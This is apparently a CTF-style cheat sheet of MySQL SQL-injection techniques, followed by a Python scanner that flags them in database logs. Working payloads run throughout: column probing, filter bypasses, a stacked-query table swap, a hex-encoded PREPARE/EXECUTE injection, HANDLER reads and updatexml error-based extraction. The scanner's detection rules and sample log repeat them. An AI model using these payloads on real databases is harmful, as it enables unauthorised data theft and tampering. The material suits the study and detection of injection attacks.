Information gathering

SELECT

  1. version() database version
  2. user() current database user
  3. database() current database name
  4. @@datadir database data directory path
  5. @@version_compile_os operating system the server was built for

Other

  1. show columns from table_name; column information
  2. show databases; all database names
  3. show tables; all table names
  4. Injecting 1' order by 2 # probes the number of columns in the query

String concatenation

  1. concat(str1,str2,…) joins the fields you query into one string
  2. concat_ws(separator,str1,str2,…) joins the fields you query with a separator of your choice
  3. group_concat([DISTINCT] column [ORDER BY column ASC|DESC] [SEPARATOR separator]) joins the values of a column across rows

Example

SELECT concat(table_name, ' ', column_name) FROM information_schema.COLUMNS WHERE TABLE_SCHEMA = DATABASE();
SELECT group_concat(table_name, column_name separator '_') FROM information_schema.COLUMNS WHERE TABLE_SCHEMA = DATABASE();

Keyword filtering

Simple methods:

  1. Mixed case (seLect, whEre, …)
  2. SEL<>ECT (when PHP strips tags)
  3. Space -> ()
  4. = -> like

These are extremely easy to block, so other methods are listed below.

Table swapping with ALTER/RENAME (stacked injection)

alter table (add/change/drop)

select data from words where id = '1';
rename table words
    to words1;
rename table `1919810931114514`
    to words;
alter table words
    add `id` int auto_increment primary key;
alter table words
    change flag data varchar(100);#';

Reference: https://ek1ng.com/notes.html#%E6%80%9D%E8%B7%AF%E4%B8%80

Hex bypass

Hex-encode the SQL statement, then have the server execute it. For example select * from table_name => 73656c656374202a2066726f6d207461626c655f6e616d65, injected as:

1';SeT@a=0x73656c656374202a2066726f6d207461626c655f6e616d65;prepare execsql from @a;execute execsql;%23

In the sample, SET is written in mixed case to get past the keyword filter.

HANDLER (MySQL)

HANDLER tbl_name OPEN [ [AS] alias]

HANDLER tbl_name READ index_name { = | <= | >= | < | > } (value1,value2,...)
    [ WHERE where_condition ] [LIMIT ... ]
HANDLER tbl_name READ index_name { FIRST | NEXT | PREV | LAST }
    [ WHERE where_condition ] [LIMIT ... ]
HANDLER tbl_name READ { FIRST | NEXT }
    [ WHERE where_condition ] [LIMIT ... ]

HANDLER tbl_name CLOSE

From this syntax:

handler table_name open as `a`; handler `a` read next;

Error-based injection

updatexml(xml_document, XPath_string, new_value)

When argument 2, the XPath expression, is invalid, MySQL raises an error whose message echoes the contents of argument 2.

0x7e (~) is used here to make sure the XPath is invalid.

updatexml(1,concat(0x7e,(select(database())),0x7e),1)

updatexml shows at most 32 characters, so combine it with substr, left or right.

Use limit when the subquery returns more than one row.

updatexml(1,concat(0x7e,((select(text)from(wfy_comments)limit 11,1)),0x7e),1)

In the sample, limit 11,1: the 11 selects the 12th row (11 counted from 0) and the 1 fetches one row starting there; error-based injection only needs one row at a time.

This can be attached to the injected SQL statement with ^.

References:
https://ek1ng.com/notes.html#%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%982019-HardSQL
https://cloud.tencent.com/developer/article/1630134
https://vidar-team.feishu.cn/docx/doxcnlBu6zBZWkzfRcX78hv8DNS
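As an added defender-side example (not part of the original notes), this Python scanner walks MySQL general_log-style lines and flags the techniques collected above: it decodes 0x... literals so the SET @a / PREPARE ... FROM @a pair shows the SQL it would run, matches case-insensitively so the SeT mixed-case trick does not help, and has one rule each for HANDLER ... READ, updatexml (plus its sibling extractvalue), RENAME/ALTER TABLE and the ORDER BY n # column probe. The log format, rule names and sample lines are constructed assumptions.

```python
import re

# Constructed sample lines in MySQL general_log style; not real captures.
SAMPLE_LOG = """\
2024-01-01T10:00:00Z 12 Query select data from words where id = '1'
2024-01-01T10:00:01Z 12 Query select data from words where id = '1' order by 2 #'
2024-01-01T10:00:02Z 13 Query SeT @a=0x73656c656374202a2066726f6d207461626c655f6e616d65
2024-01-01T10:00:02Z 13 Query prepare execsql from @a
2024-01-01T10:00:03Z 14 Query handler words open as `a`
2024-01-01T10:00:03Z 14 Query handler `a` read next
2024-01-01T10:00:04Z 15 Query select updatexml(1,concat(0x7e,(select(database())),0x7e),1)
2024-01-01T10:00:05Z 16 Query rename table words to words1
"""

HEX_LITERAL = re.compile(r"0x((?:[0-9a-fA-F]{2})+)\b")
LOG_LINE = re.compile(r"^\S+\s+(\d+)\s+Query\s+(.*)$")

# Rules run against the decoded query text; re.I defeats mixed-case keywords.
RULES = [
    ("stacked_prepare", re.compile(r"\bprepare\s+\w+\s+from\s+@\w+", re.I)),
    ("hex_encoded_sql", re.compile(
        r"\bset\s+@\w+\s*=\s*'(select|insert|update|delete|alter|rename|drop)\b", re.I)),
    ("handler_read", re.compile(r"\bhandler\b.*\bread\b", re.I)),
    ("xpath_error_leak", re.compile(r"\b(updatexml|extractvalue)\s*\(", re.I)),
    ("table_swap", re.compile(r"\b(rename|alter)\s+table\b", re.I)),
    ("column_count_probe", re.compile(r"\border\s+by\s+\d+\s*(#|--)", re.I)),
]


def decode_hex_literals(sql):
    """Replace printable 0x... literals with quoted text so the analyst sees
    what a SET @a=0x... / PREPARE ... FROM @a pair would actually execute."""
    def repl(m):
        raw = bytes.fromhex(m.group(1))
        try:
            return "'" + raw.decode("ascii") + "'"
        except UnicodeDecodeError:
            return m.group(0)  # binary payload: leave the literal untouched
    return HEX_LITERAL.sub(repl, sql)


def scan(log_text):
    """Return (connection_id, rule_name, decoded_query) for every flagged line."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        conn_id, query = int(m.group(1)), decode_hex_literals(m.group(2))
        for name, pattern in RULES:
            if pattern.search(query):
                findings.append((conn_id, name, query))
    return findings
```

Grouping findings by connection id is what makes the stacked cases visible: connection 13 both sets a hex literal and prepares from it in the same session.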